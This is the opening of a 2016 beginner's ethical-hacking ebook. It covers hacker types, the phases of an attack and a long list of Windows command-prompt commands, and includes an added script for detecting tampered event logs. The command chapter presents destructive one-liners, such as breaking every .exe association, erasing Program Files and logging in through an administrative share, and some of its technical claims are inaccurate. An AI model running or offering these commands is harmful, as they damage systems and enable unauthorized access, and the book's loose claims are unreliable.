H4CK3R : A Beginner’s Guide


H4CK3R : A Beginner’s Guide
2016
“KNOWLEDGE iS FREE”
www.facebook.com/H4CK3RTHEBOOK
THE HACKING SAGE : ETHICAL HACKING & IT SECURITY
Facebook.com/thehackingsage | Twitter.com/thehackingsage | Instagram.com/thehackingsage
H4CK3R : A Beginner’s Guide
www.facebook.com/H4CK3RTHEBOOK
THE HACKiNG SAGE : Ethical Hacking & IT Security
Contact US : +919919605516 (WhatsApp)
Facebook : www.facebook.com/thehackingsage
Twitter : www.twitter.com/thehackingsage
Instagram : www.instagram.com/thehackingsage
For More, Log On : www.thehackingsagerises.blogspot.com
Legal Disclaimer :
The information provided in this eBook “H4CK3R : A Beginner’s Guide” is to be used for
educational purposes only. The author holds no responsibility for any misuse of the
information provided. This book is totally meant for providing information on "Ethical
Hacking”.
While Using This Book And Reading Various Hacking Tutorials, You Agree To
Follow The Below Mentioned Terms & Conditions :
All The Information Provided In This Book Is For Educational Purposes Only.
The Book Author Is No Way Responsible For Any Misuse Of The Information.
"H4CK3R : A Beginner’s Guide” Is Just A Term That Represents The Name Of
The Book And Is Not A Book That Provides Any Illegal Information. “H4CK3R :
A Beginner’s Guide” Is A Book Related To Computer Security And Not A Book
That Promotes Hacking/Cracking/Software Piracy.
This Book Is Totally Meant For Providing Information On "Computer Security",
"Computer Programming" And Other Related Topics And Is No Way Related
Towards The Terms "Cracking" Or "Hacking" (Unethical).
Few Articles (Tutorials) In This Book May Contain The Information Related To
"Hacking Passwords” Or "Hacking Email Accounts” (Or Similar Terms). These
Are Not The Guides Of Hacking. They Only Provide Information About The
Legal Ways Of Retrieving The Passwords. You Shall Not Misuse The Information
To Gain Unauthorized Access. However You May Try Out These Hacks On Your
Own Computer At Your Own Risk. Performing Hack Attempts (Without
Permission) On Computers That You Do Not Own Is Illegal.
The Virus Creation Section In This Book Provides Demonstration On Coding
Simple Viruses Using High Level Programming Languages. These Viruses Are
Simple Ones And Cause No Serious Damage To The Computer. However We
Strongly Insist That These Information Shall Only Be Used To Expand
Programming Knowledge And Not For Causing Malicious Attacks.
All The Information In This Book Is Meant For Developing Hacker Defense
Attitude Among The Readers And Help Preventing The Hack Attacks. “H4CK3R
: A Beginner’s Guide” Insists That This Information Shall Not Be Used For
Causing Any Kind Of Damage Directly Or Indirectly. However You May Try
These Codes On Your Own Computer At Your Own Risk.
The Word "Hack" Or "Hacking" That Is Used In This Book Shall Be Regarded As
"Ethical Hack" Or "Ethical Hacking" Respectively. We Believe Only In White
Hat Hacking. On The Other Hand We Condemn Black Hat Hacking.
Most Of The Information Provided In This Book Are Simple Computer Tricks
(May Be Called By The Name Hacks) And Are No Way Related To The Term
Hacking. Some Of The Tricks Provided By Us May No Longer Work Due To
Fixes For The Bugs That Enabled The Exploits. We Are Not Responsible For
Any Direct Or Indirect Damage Caused Due To The Usage Of The Hacks
Provided In The Book.
Acknowledgements :
“For Any Successful Work, It Owes To Thank Many”
The Book "H4CK3R : A Beginner’s Guide" Is Tremendously Complex To Write, Particularly
Without Support Of The Almighty GOD. I Express Heartfelt Credit To My Parents
Without Them I Have No Existence. I Am More Than Ever Thankful To Google &
Thankful To All Hacking Sites & Blogs For The Inspiration Which I Got For Learning
Hacking And Getting Such Great Opportunity To Write The Book. I Am Also Thankful
To My Sister Mahi & My Friends Who Helped Me To Complete This Book..
Specially Thanks To & My BFF Sumedha & Thanks To Eminem, Lil Wayne, Naruto &
Goku.. Taught Me To Never Give Up.. :)
To Finish, I Am Thankful To You Also As You Are Reading This Book. I Am Sure This
Book Will Play A Creative And Constructive Role In Making Your Life More Secure And
Alert Than Ever Before..
- Vipul Tiwari (Author)
About The Author :
Vipul Tiwari Is An Ethical Hacker, Famous For His Blog THE HACKiNG SAGE.
He started his career at the very young age of 17. Since then he has performed the roles of
Experienced Ethical Hacker, Cyber Security Expert, and Penetration Tester.
He Is Also Providing The Services Like Ethical Hacking Training And Workshops,
Network Security, System Security, Website Development and Maintenance & Security
Consultant..
Facebook : www.facebook.com/hackervipul
Twitter : www.twitter.com/vipultiwari007
Instagram : www.instagram.com/thehackingsage
About The Book :
The Goal Of This Book Is To Introduce To People The True Philosophy And Ethics Of
The Elusive World Of Hacking. I Will Show You Everything There Is To Show In
Hacking. Every Single Hacking Technique That Exists, How It Works And How To
Actually Carry Them Out Yourself. You Will Get To Know How To Protect Yourself
From These Same Hacks And Eventually I Hope To Clear The Bad Name That Has
Been Given To Hackers Around The Globe.
So, Your Journey Begins Right Here, Right Now..
Facebook : www.facebook.com/H4CK3RTHEBOOK
Blog : www.thehackingsagerises.blogspot.com
Table of Contents :
1. Concept Of Ethical Hacking
2. How To Become An Ethical Hacker?
3. DOS Hacking & Commands
4. Registry & Group Policy Editor In Windows
5. Windows Tricks & Hacks
6. Change & Hide IP Address
7. Change MAC Address?
8. System Password Cracking
9. Backdoor
10. Software Hacking
11. Keylogger
12. Trojans
13. Cross Site Scripting (XSS)
14. Phishing
15. Sniffers
16. Email Hacking
17. Hack Facebook Accounts and Passwords
18. Google Hacking
19. Wireless Hacking
20. WiFi Hacking (WPA/WPA2 & WEP)
21. Website Hacking
22. Linux Hacking
23. Best Operating System For Penetration Testing / Hacking
24. Mobile Hacking (SMS & Call)
25. Android Hacking
BONUS
List of Windows Shortcuts
List of PC File Extensions
A History Of Hacking
1. Concept Of Ethical Hacking.
What is Hacking?
The Art of exploring various security breaches is termed Hacking. Computer Hackers
have been around for many years. Since the Internet became widely used in the
World, we have started to hear more and more about hacking. Only a few Hackers, such
as Kevin Mitnick, are well known.
In a world of Black and White, it’s easy to describe the typical Hacker. A general outline
of a typical Hacker is an Antisocial, Pimple-faced Teenage boy. But the Digital world
has many types of Hackers.
Hackers are human like the rest of us and are, therefore, unique individuals, so an exact
profile is hard to outline. The best broad description of Hackers is that all Hackers
aren’t equal. Each Hacker has Motives, Methods and Skills. But some general
characteristics can help you understand them. Not all Hackers are Antisocial,
Pimple-faced Teenagers. Regardless, Hackers are curious about Knowing new things,
Brave enough to take steps, and often very Sharp Minded.
What is a Hacker?
Traditionally, a Hacker is someone who likes to play with Software or Electronic
Systems. Hackers enjoy Exploring and Learning how Computer systems operate. They
love discovering new ways to work electronically.
Recently, Hacker has taken on a new meaning: someone who maliciously breaks into
systems for personal gain. Technically, these criminals are Crackers, or Criminal
Hackers. Crackers break into systems with malicious intentions. They do it for Personal
gain, Fame, Profit and even Revenge. They Modify, Delete and Steal critical
information, often making other people's life miserable.
Hacking has a lot of meanings depending upon the person’s knowledge and his work
intentions. Hacking is an Art as well as a Skill. Hacking is the knowledge by which one
gets to achieve his Goals, anyhow, using his Skills and Power.
Most people associate Hacking with breaking the law, and therefore consider everyone who
engages in hacking activities to be a criminal. We agree that there are people out there
who use hacking techniques to break the law, but hacking is not really about that. In
fact, hacking is more about following the law and performing the steps within the limits.
Hacker vs. Cracker
What Is the Difference Between a Hacker and a Cracker ?
Many articles have been written about the difference between Hackers and crackers,
which attempt to correct public misconceptions about hacking. For many years, media
has applied the word Hacker when it really means Cracker. So the public now believes
that a Hacker is someone who breaks into computer systems and steals confidential data.
This is very untrue and is an insult to some of our most talented Hackers.
There Are Various Points To Determine The Difference Between Hackers And
Crackers..
A Hacker is a person who is interested in the working of any computer Operating
system. Most often, Hackers are programmers. Hackers obtain advanced knowledge of
operating systems and programming languages. They may know various security holes
within systems and the reasons for such holes. Hackers constantly seek further
knowledge, share what they have discovered, and they never have intentions about
damaging or stealing data.
A Cracker is a person who breaks into other people's systems, with malicious intentions.
Crackers gain unauthorized access, destroy important data, stop services provided by
the server, or basically cause problems for their targets. Crackers can easily be
identified because their actions are malicious.
Whatever the case, most people give Hacker a negative outline. Many malicious Hackers
are electronic thieves. Just like anyone can become a thief, or a robber, anyone can
become a Hacker, regardless of age, gender, or religion. Technical skills of Hackers vary
from one to another. Some Hackers barely know how to surf the Internet, whereas
others write software that other Hackers depend upon..
Types Of Hackers
Let’s See The Categories Of Hackers On The Basis Of Their Knowledge :
Coders : The Real Hackers are the Coders, the ones who revise the methods and create
tools that are available in the market. Coders can find security holes and weaknesses in
software to create their own exploits. These Hackers can use those exploits to develop
fully patched and secure systems.
Coders are the programmers who have the ability to find the unique vulnerability in
existing software and to create working exploit codes. These are the individuals with a
deep understanding of the OSI Layer Model and TCP/IP Stacks.
Admins : Admins are the computer guys who use the tools and exploits prepared by the
coders. They do not develop their own techniques; instead they use the tricks which
are already prepared by the coders. They are generally System Administrators or
Computer Network Controllers. Most of the Hackers and security people in this digital
world come under this category.
Admins have experience with several operating systems, and know how to exploit
several existing vulnerabilities. A majority of Security Consultants fall in this group and
work as a part of Security Team.
Script Kiddies : The next and most dangerous class of Hackers is Script Kiddies. They
are the new generation of computer users who take advantage of the Hacker tools and
documentation available for free on the Internet but don’t have any knowledge of what’s
going on behind the scenes. They know just enough to cause you headaches but typically
are very sloppy in their actions, leaving all sorts of digital fingerprints behind. Even
though these guys are the teenage Hackers that you hear about in the news media, they
need only minimum skills to carry out their attacks.
Script Kiddies are the bunnies who use script and programs developed by others to
attack computer systems and Networks. They get the least respect but are most
annoying and dangerous and can cause big problems without actually knowing what
they are doing.
Types Of Hackers On The Basis Of Activities Performed By Them :
White Hat Hacker : A White Hat Hacker is a computer guy who performs Ethical
Hacking. These are usually security professionals with knowledge of hacking and the
Hacker toolset who use this knowledge to locate security weaknesses and
implement countermeasures in the resources.
They are also known as Ethical Hackers or Penetration Testers. They focus on
Securing and Protecting IT Systems.
Black Hat Hacker : A Black Hat Hacker is a computer guy who performs Unethical
Hacking. These are the Criminal Hackers or Crackers who use their skills and
knowledge for illegal or malicious purposes. They break into or otherwise violate the
system integrity of remote machines, with malicious intent.
They are also known as Unethical Hackers or Security Crackers. They focus on
Security Cracking and Data stealing.
Grey Hat Hacker : A Grey Hat Hacker is a Computer guy who sometimes acts legally,
sometimes in good will, and sometimes not. They usually do not hack for personal gain
or have malicious intentions, but may or may not occasionally commit crimes during the
course of their technological exploits. They are a hybrid between White Hat and Black Hat
Hackers.
Ethical Hacking
Ethical Hacking is testing the resources for a good cause and for the betterment of
technology. Technically Ethical Hacking means penetration testing which is focused on
Securing and Protecting IT Systems.
Hacktivism
Another type of Hackers are Hacktivists, who try to broadcast political or social
messages through their work. A Hacktivist wants to raise public awareness of an issue.
Examples of hacktivism are the Web sites that were defaced with the Jihad messages in
the name of Terrorism.
Cyber Terrorist
There are Hackers who are called Cyber Terrorists, who attack government computers
or public utility infrastructures, such as power stations and air-traffic-control towers.
They crash critical systems or steal classified government information. While in a
conflict with enemy countries, some governments start Cyber war via the Internet.
Why Hackers Hack?
The main reason why Hackers hack is because they can hack. Hacking is a casual hobby
for some Hackers; they just hack to see what they can hack and what they can’t hack,
usually by testing their own systems. Many Hackers are the guys who get kicked out of
corporate and government IT and security organizations. They try to bring down the
status of the organization by attacking or stealing information.
The knowledge that malicious Hackers gain and the ego that comes with that knowledge
is like an addiction. Some Hackers want to make your life miserable, and others simply
want to be famous. Some common motives of malicious Hackers are revenge, curiosity,
boredom, challenge, theft for financial gain, blackmail, extortion, and corporate work
pressure.
Many Hackers say they do not hack to harm or profit through their bad activities, which
helps them justify their work. They are often not looking to fill their pockets with money. Just
proving a point is often a good enough reward for them.
Prevention From Hackers
What Can Be Done To Prevent Hackers From Finding New Holes In Software
And Exploiting Them ?
1. Information security research teams exist to try to find these holes and notify
vendors before they are exploited. There is a beneficial competition occurring
between the Hackers securing systems and the Hackers breaking into those
systems. This competition provides us with better and stronger security, as well
as more complex and sophisticated attack techniques.
2. Defending Hackers create Detection Systems to track attacking Hackers, while
the attacking Hackers develop bypassing techniques, which eventually
result in bigger and better detecting and tracking systems. The net result of
this interaction is positive, as it produces smarter people, improved security,
more stable software, inventive problem-solving techniques, and even a new
economy.
3. Now, when you need protection from Hackers, whom do you want to call? “The
Ethical Hackers”. An Ethical Hacker possesses the skills, mindset, and tools of a
Hacker but is also trustworthy. Ethical Hackers perform the hacks as security
tests for computer systems.
4. Ethical Hacking, also known as Penetration Testing or White-Hat Hacking,
involves the same Tools, Tricks and Techniques that Hackers use, but with one
major difference:
5. Ethical hacking is Legal.
6. Ethical hacking is performed with the target’s permission. The intent of Ethical
Hacking is to discover vulnerabilities from a Hacker’s viewpoint so systems can
be better secured. Ethical Hacking is part of an overall information Risk
Management program that allows for ongoing security improvements. Ethical
hacking can also ensure that vendors’ claims about the security of their products
are legitimate.
7. As Hackers expand their knowledge, so should you. You must think like them to
protect your systems from them. You, as the ethical Hacker, must know the activities
Hackers carry out and how to stop their efforts. You should know what to look for
and how to use that information to thwart Hackers’ efforts.
8. You don’t have to protect your systems from everything. You can’t.
The Only Protection Against Everything Is To Unplug Your Computer Systems And
Lock Them Away So No One Can Touch Them - Not Even You.
That’s not the best approach to information security. What’s important is to protect your
systems from known Vulnerabilities and common Hacker attacks.
It’s impossible to overcome all possible vulnerabilities of your systems. You can’t plan
for all possible attacks, especially the ones that are currently unknown, which are
called Zero Day Exploits. These are the attacks which are not known to the world.
However, in Ethical Hacking, the more combinations you try (the more you test whole
systems instead of individual units), the better your chances of discovering
vulnerabilities.
Steps Performed By Hackers :
1) Reconnaissance
2) Scanning
3) Gaining Access
4) Maintaining Access
5) Clearing Tracks
Performing Reconnaissance
Scanning and Enumeration
Gaining access
Maintaining access and Placing Backdoors
Covering tracks or Clearing Logs
Reconnaissance
Reconnaissance can be described as the pre-attack phase and is a systematic attempt to
locate, gather, identify, and record information about the target. The Hacker seeks to
find out as much information as possible about the target.
Scanning and Enumeration
Scanning and enumeration is considered the second pre-attack phase. This phase
involves taking the information discovered during reconnaissance and using it to
examine the network. Scanning involves steps such as intelligent system port scanning
which is used to determine open ports and vulnerable services. In this stage the attacker
can use different automated tools to discover system vulnerabilities.
Gaining Access
This is the phase where the real hacking takes place. Vulnerabilities discovered during
the reconnaissance and scanning phase are now exploited to gain access. The method of
connection the Hacker uses for an exploit can be a local area network, local access to a
PC, the Internet, or offline. Gaining access is known in the Hacker world as owning the
system. During a real security breach it would be this stage where the Hacker can
utilize simple techniques to cause irreparable damage to the target system.
Maintaining Access and Placing Backdoors
Once a Hacker has gained access, they want to keep that access for future exploitation
and attacks. Sometimes, Hackers harden the system from other Hackers or security
personnel by securing their exclusive access with Backdoors, Root kits, and Trojans.
The attacker can use automated scripts and automated tools for hiding attack evidence
and also to create backdoors for further attack.
Clearing Tracks
In this phase, once Hackers have been able to gain and maintain access, they cover their
tracks to avoid detection by security personnel, to continue to use the owned system, to
remove evidence of hacking, or to avoid legal action. At present, many successful
security breaches are made but never detected. This includes cases where firewalls and
vigilant log checking were in place.
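The log-checking side of this phase, as an added example that is not part of the original book: it scans an exported copy of Windows event records for the standard "log was cleared" events (Security 1102, System 104), for missing record numbers, and for long silent periods. The CSV column names, the sample rows and the six-hour threshold are assumptions made for the example.

```python
"""Flag signs of event-log tampering in an exported set of records."""
import csv
import io
from datetime import datetime, timedelta

# Events Windows writes when a log is cleared: (channel, event id).
CLEAR_EVENTS = {("Security", 1102), ("System", 104)}

# Constructed sample export; the column layout is an assumption of this example.
SAMPLE_EXPORT = """\
record_id,time,channel,event_id
5001,2016-03-01T09:00:05,Security,4624
5002,2016-03-01T09:04:10,Security,4688
5003,2016-03-01T09:10:00,Security,4634
5007,2016-03-01T09:40:00,Security,4624
5008,2016-03-01T21:15:00,Security,1102
5009,2016-03-01T21:16:00,Security,4624
880,2016-03-01T08:00:00,System,7036
881,2016-03-01T08:30:00,System,104
882,2016-03-01T08:31:00,System,7036
"""


def load_events(text):
    """Parse the CSV export into a list of typed event dictionaries."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        events.append({
            "record_id": int(row["record_id"]),
            "time": datetime.fromisoformat(row["time"]),
            "channel": row["channel"],
            "event_id": int(row["event_id"]),
        })
    return events


def find_tampering(events, max_quiet=timedelta(hours=6)):
    """Return (kind, channel, detail) findings, ordered by channel and record.

    kind is one of:
      log-cleared   detail = record id of the clear event
      record-gap    detail = number of missing record ids before this record
      quiet-period  detail = record id that ends a silence longer than max_quiet
    Gaps and quiet periods are heuristics: they say where to look, not what
    happened.
    """
    by_channel = {}
    for event in events:
        by_channel.setdefault(event["channel"], []).append(event)

    findings = []
    for channel in sorted(by_channel):
        records = sorted(by_channel[channel], key=lambda e: e["record_id"])
        previous = None
        for event in records:
            if (channel, event["event_id"]) in CLEAR_EVENTS:
                findings.append(("log-cleared", channel, event["record_id"]))
            if previous is not None:
                # Record ids are sequential per channel, so a jump means
                # records are absent from the collected set.
                missing = event["record_id"] - previous["record_id"] - 1
                if missing > 0:
                    findings.append(("record-gap", channel, missing))
                if event["time"] - previous["time"] > max_quiet:
                    findings.append(("quiet-period", channel, event["record_id"]))
            previous = event
    return findings


if __name__ == "__main__":
    for finding in find_tampering(load_events(SAMPLE_EXPORT)):
        print(finding)
```

Running the check against a copy of the logs forwarded to another machine is what makes it useful, since that copy is not affected when the local log is cleared.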
Working Of An Ethical Hacker :
Obeying The Ethical Hacking Commandments
Every Ethical Hacker must follow a few basic principles. If he does not follow them, bad things
can happen. Most of the time these principles get ignored or forgotten when planning or
executing ethical hacking tests. The results can even be very dangerous.
Working Ethically
The word ethical can be defined as working with high professional morals and
principles. Whether you’re performing ethical hacking tests against your own systems or
for someone who has hired you, everything you do as an ethical Hacker must be
approved and must support the company’s goals. No hidden agendas are allowed!
Trustworthiness is the ultimate objective. The misuse of information is absolutely not
allowed. That’s what the bad guys do.
Respecting Privacy
Treat the information you gather with complete respect. All information you obtain
during your testing, from Web application log files to clear-text passwords, must be
kept private.
Not Crashing Your Systems
One of the biggest mistakes people make when they try to hack their own systems is that they end up
crashing those systems. The main reason for this is poor planning. These testers
have not read the documentation or misunderstand the usage and power of the security
tools and techniques.
You can easily create miserable conditions on your systems when testing. Running too
many tests too quickly on a system causes many system lockups. Many security
assessment tools can control how many tests are performed on a system at the same
time. These tools are especially handy if you need to run the tests on production systems
during regular business hours.
Executing The Plan
In Ethical hacking, Time and patience are important. Be careful when you’re performing
your ethical hacking tests. A Hacker in your network or an employee looking over your
shoulder may watch what’s going on. This person could use this information against
you. It’s not practical to make sure that no Hackers are on your systems before you
start. Just make sure you keep everything as quiet and private as possible. This is
especially critical when transmitting and storing your test results. You’re now on a
reconnaissance mission. Find as much information as possible about your organization
and systems, which is what malicious Hackers do. Start with a broad view and
narrow your focus. Search the Internet for your organization’s name, your computer and
network system names, and your IP addresses. Google is a great place to start for this.
Don’t take ethical hacking too far, though. It makes little sense to harden your systems
from unlikely attacks. For instance, if you don’t have an internal Web server running, you
may not have to worry too much about it. However, don’t forget about insider threats from
malicious employees or your friends or colleagues!
Fundamentals Of Hacking
Hacking depends on a basic knowledge of computer systems as well as a basic
knowledge of software.
To hack something, a few fundamentals can be used to make the hacking easier.
1. First, try to learn about your target/destination.
2. Try to get more information about the target. This process is also called "Social
Engineering". Any emotional or social method may be used in 'Social ENG'.
3. If the hacking can be done with the help of any software, then use that software to
hack it.
4. If no software is available for this, work out a logical method of hacking that
relates to your target. Try to relate this logic to the information obtained through 'Social
ENG'.
5. Then use your logical method according to the conditions. If the conditions are not in your
favour, try to create the conditions.
6. Use your logic according to the conditions and try the hacking process.
Apart from these, more about the fundamentals of hacking will be described in further study..
...
2. How To Become An Ethical Hacker?
Now, most of us hear the word hacker and fear strikes, anger strikes in our minds. It is
generally because a hacker is a misunderstood guy in society. Not all hackers are bad;
there are three types of hackers :
Black Hat | Bad Hacker
Grey Hat | Both Good And Bad
White Hat | Good Hacker
Now here I have a good list to guide you on how to become a hacker. Follow it and
fulfill your dream.
Operating Systems (Specifically Linux/Unix) :
A true hacker totally depends on open source and freeware. Also, Linux/Unix operating
systems are the best for learning hacking and also for hacking anything.
A hacker must have a good knowledge of Linux Operating Systems like : Red Hat, Kali
Linux, Debian, BackBox. It's very important to learn more than one Linux Operating
System.
Programming :
It is important for a person in the hacking field to learn more than one programming language.
There are many programming languages to learn, such as Python, JAVA, C++. Free
tutorials are easily available online. Specifically in the hacking field,
languages like C++, Python, SQL etc. are very important.
Cryptography :
Now this is where things get interesting. You are a hacker and you are transferring
files over the internet to your pal, and another hacker breaks in and takes your file, and now
he knows everything. To prevent this you need to master the art of cryptography. Look for
a cryptography tutorial on the internet and learn it.
Networking Concepts :
You need to be good at networking concepts and understand how networks are
created. You need to know the differences between different types of networks and must
have a clear understanding of TCP/IP and UDP to exploit loopholes in a
system. Understanding what a LAN, WAN, VPN and Firewall are is also important. You must
have a clear understanding of, and be able to use, network tools such as Wireshark and NMAP for
packet analysis, network scanning etc.
Learn A Lot :
Visit websites which teach hacking and networking exploitation, sign up on hacking
forums, ask for help and discuss with other hackers. Learn from expert hackers. Learn about
phishing, sniffers, Trojans, RATs etc. Also learn a good amount of batch programming and
shell programming.
Practice :
After learning a few programming concepts or OS concepts, sit and practice them. Set up
your own Hacker Lab on a good system with a good processor and RAM, because your
regular system won’t handle hacking too smoothly.
Find/ Write Vulnerabilities :
A vulnerability is the weakness, loophole or open door through which you enter the
system. Look for vulnerabilities by scanning the system, network etc. Try to write your
own vulnerability programs and exploit the system.
Become A Certified Ethical Hacker
The Certified Ethical Hacker program is the pinnacle of the most desired information
security training program any information security professional will ever want to be in.
To master the hacking technologies, you will need to become one, but an ethical one! The
accredited course provides the advanced hacking tools and techniques used by hackers
and information security professionals alike to break into an organization. As we put
it, “to beat a hacker, you need to think like a hacker”. This course will immerse
you into the hacker mindset so that you will be able to defend against future attacks.
The security mindset in any organization must not be limited to the silos of a certain
vendor, technologies or pieces of equipment.
Certified Ethical Hacker program by EC Council :
https://www.eccouncil.org/Certification/certified-ethical-hacker
In this book I’ll teach you some lil stuff that will help you to become an Ethical Hacker..
...
3. DOS Hacking & Commands
DOS (Disc Operating System) is an operating system that works on the concept of
command user interface. We have to use some commands to work with DOS.
Now, we have many operating systems like windows xp, vista, 7, 8 & 10 that works on
the concept of graphic user interface, we can work using commands on above operating
system by using an application called cmd.
Window key + r > type cmd > hit enter.
There are some commands which are used in ethical hacking..
Assoc : it is used to lock all exe of system : assoc.exe=anyname
To unlock all exe of system : assoc.exe=exefile
Ipconfig : it is used to know the IP address of your own system.
Ping : it is used to get the IP address of any other system : ping www.sitename.com
Getmac : it is used to get the MAC address of any other system.
TCP/IP : TCP/IP stands for Transmission Control Protocol/Internet Protocol. As you can
guess by the name, TCP/IP is the protocol under which the Internet runs, along with
User Datagram Protocol (UDP). So when you are connected to the Internet, you can try
these commands against other Internet computers. Most local area networks also use
TCP/IP.
Some TCP/IP Commands :
telnet
netstat
nslookup
tracert
ping
ftp
NetBIOS : The NetBIOS (Network Basic Input/Output System) protocol is another way to
communicate between computers. It is often used by Windows computers, and by
Unix/Linux type computers running Samba. You can often use NetBIOS commands over
the Internet (being carried inside of, so to speak, TCP/IP). In many cases, however,
NetBIOS commands will be blocked by firewalls. Also, not many Internet computers run
NetBIOS because it is so easy to break into computers that use it.
* Netstat = view the stats of the computers one feature is to get people’s i.p. for more
type netstat/?
* fsutil and fsutil fsinfo = shows you things like list of all drives
* ipconfig or ipconfig/all = shows you i.p. and all others in a network
* erase c:\program files = erases all program files or leave just the c delete everything
* nbtstat = getting information on your computer and others
* tree = displays all files on program files and desktop good for seeing if you have any
keyloggers
* tracert (ip) = to see if the i.p. exist
* net use c: \\pcname\c$ /user: pcname\administrator = to sign in as an administrator
that’s not signed in
* nslookup set exp:hotmail.com = getting ips from web sites
* /whois (screename) = only on a chat room, to find information a that person which
owns the screename an i.p.
For Use In Command Prompt For Path Changing :
* diskpart = shows you stuff like the computer name and Takes you to disk part option
* cd\progra~1 enter then dir = programs installed (2)
* cd \windows \system = to look for stuff in this folders
* telnet : remote controlling
* net start messenger = start net send when it is disable For use in command prompt
only on a network or hacking
* bootcfg = you can make changes to boot the computer, Boot it mess it up
* gpresult = shows all the information of a computer
* driverquery = list of drives and their properties
* getmac = this gets the mac (media access control) address
* netsh = good for hacking a network configuration tool Type netsh /? For more
* openfiles = only for windows professional allows an Administrator to display or
disconnect open files
* reg = the console registry tool
* systeminfo = info
* tasklist and taskkill = like pressing ctrl+alt+delete
Some DOS Commands :
ADDUSERS Helps Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders *
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data
DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files
FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Loop command: all options Files, Directory, List
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line
HELP Online Help
HFNETCHK Network Security Hotfix Checker
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
KILL Remove a program from memory
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files
NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who’s logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory
QGREP Search file(s) for lines that match a given pattern.
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Control the visibility of environment variables
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file
USRSTAT List domain usernames and last login
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
